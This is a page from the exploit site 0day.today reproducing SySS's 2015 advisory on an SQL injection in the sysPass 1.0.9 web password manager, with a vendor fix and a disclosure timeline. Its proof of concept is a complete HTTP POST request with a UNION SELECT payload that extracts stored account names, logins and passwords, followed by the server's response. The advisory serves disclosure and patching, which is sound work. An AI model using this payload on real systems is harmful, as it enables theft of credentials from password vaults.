0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
sysPass 1.0.9 - SQL Injection Vulnerability
Product: sysPass Vendor: http://cygnux.org/ Affected Version(s): 1.0.9 and below Tested Version(s): 1.0.9 Vulnerability Type: SQL Injection (CWE-89) Risk Level: High Solution Status: Fixed Vendor Notification: 2014-07-27 Solution Date: 2014-08-04 Public Disclosure: 2015-07-13 CVE Reference: Not yet assigned Author of Advisory: Daniele Salaris (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: sysPass is an web based Password Manager written in PHP and Ajax with a built-in multiuser environment. An SQL injection vulnerability could be identified in one of the requests of this web password manager. The software manufacturer describes the web application as follows (see [1]): "sysPass is a web password manager written in PHP that allows the password management in a centralized way and in a multiuser environment. The main features are: * HTML5 and Ajax based interface * Password encryption with AES-256 CBC. * Users and groups management. * Advanced profiles management with 16 access levels. * MySQL, OpenLDAP and Active Directory authentication. * Activity alerts by email. * Accounts change history. * Accounts files management. * Inline image preview. * Multilanguage. * Links to external Wiki. * Portable backup. * Action tracking and event log. * One-step install process." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The SQL injection vulnerability was found in an HTTP post request of the AJAX component from the sysPass software. The attribute getAccounts is not correctly sanitized and therefore can be abused to inject arbitrary SQL statements. This SQL injection vulnerability can be exploited by an authenticated attacker by sending a specially crafted HTTP POST request (see PoC section). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following HTTP request can be used to extract information from the database: POST /sysPass-1.0.9/ajax/ajax_search.php HTTP/1.1 Host: <HOST> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://<HOST>/sysPass-1.0.9/index.php Content-Length: 249 Cookie: PHPSESSID=<SESSIONID> Connection: keep-alive Pragma: no-cache Cache-Control: no-cache search=getAccounts') UNION ALL SELECT NULL,NULL,account_name,account_login,account_pass,account_url,NULL,NULL,NULL,NULL,NULL from accounts -- &start=0&skey=1&sorder=1&sk=081bad3198bdb3cd29133befc57d60287541663b&is_ajax=1&customer=0&category=0&rpp=10 The server answers as followed: HTTP/1.1 200 OK Date: Fri, 10 Jul 2015 14:06:04 GMT Server: Apache/2.4.12 (Unix) PHP/5.6.10 X-Powered-By: PHP/5.6.10 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=<SESSIONID>; path=/; HttpOnly Content-Length: 1147 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <div id="data-search-header" class="data-header"><ul class="round header-grey"><li class="header-txt"><a onClick="searchSort(5,0)" title="Sort by Customer" >Customer</a></li><li class="header-txt"><a onClick="searchSort(1,0)" title="Sort by Name">Name</a><img src="imgs/sort_desc.png" class="icon" /></li><li class="header-txt"><a onClick="searchSort(2,0)" title="Sort by Category">Category</a></li><li class="header-txt"><a onClick="searchSort(3,0)" title="Sort by Username">User</a></li><li class="header-txt"><a onClick="searchSort(4,0)" title="Sort by URL / IP">URL / IP</a></li></ul></div><div id="data-search" class="data-rows"><ul><li class="cell-txt txtCliente"></li><li class="cell-txt">TEST_USER</li><li class="cell-txt">TEST_NAME</li><li class="cell-txt"><DATA></li><li class="cell-txt">TEST_URL</li><li class="cell-img"><img src="imgs/btn_group.png" title="Groups:<br><br>*<br>" /></li><li class="cell-actions round"></li></ul></div><div id="pageNav" class="round shadow"><div id="pageNavLeft">1 @ 0.00478 s <span id="txtFilterOn" class="round">Filter ON</span></div><div id="pageNavRight">&nbps; 1 / 1 &nbps;</div></div> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update sysPass to the latest software version. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2014-07-27: Vulnerability discovered 2014-07-27: Vulnerability reported to vendor 2014-08-04: Vendor releases new fixed version of sysPass 2015-07-13: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Web site of sysPass - sysadmin password manager http://wiki.syspass.org/en/start [2] SySS Security Advisory SYSS-2015-031 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-031.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ # 0day.today [2024-12-25] #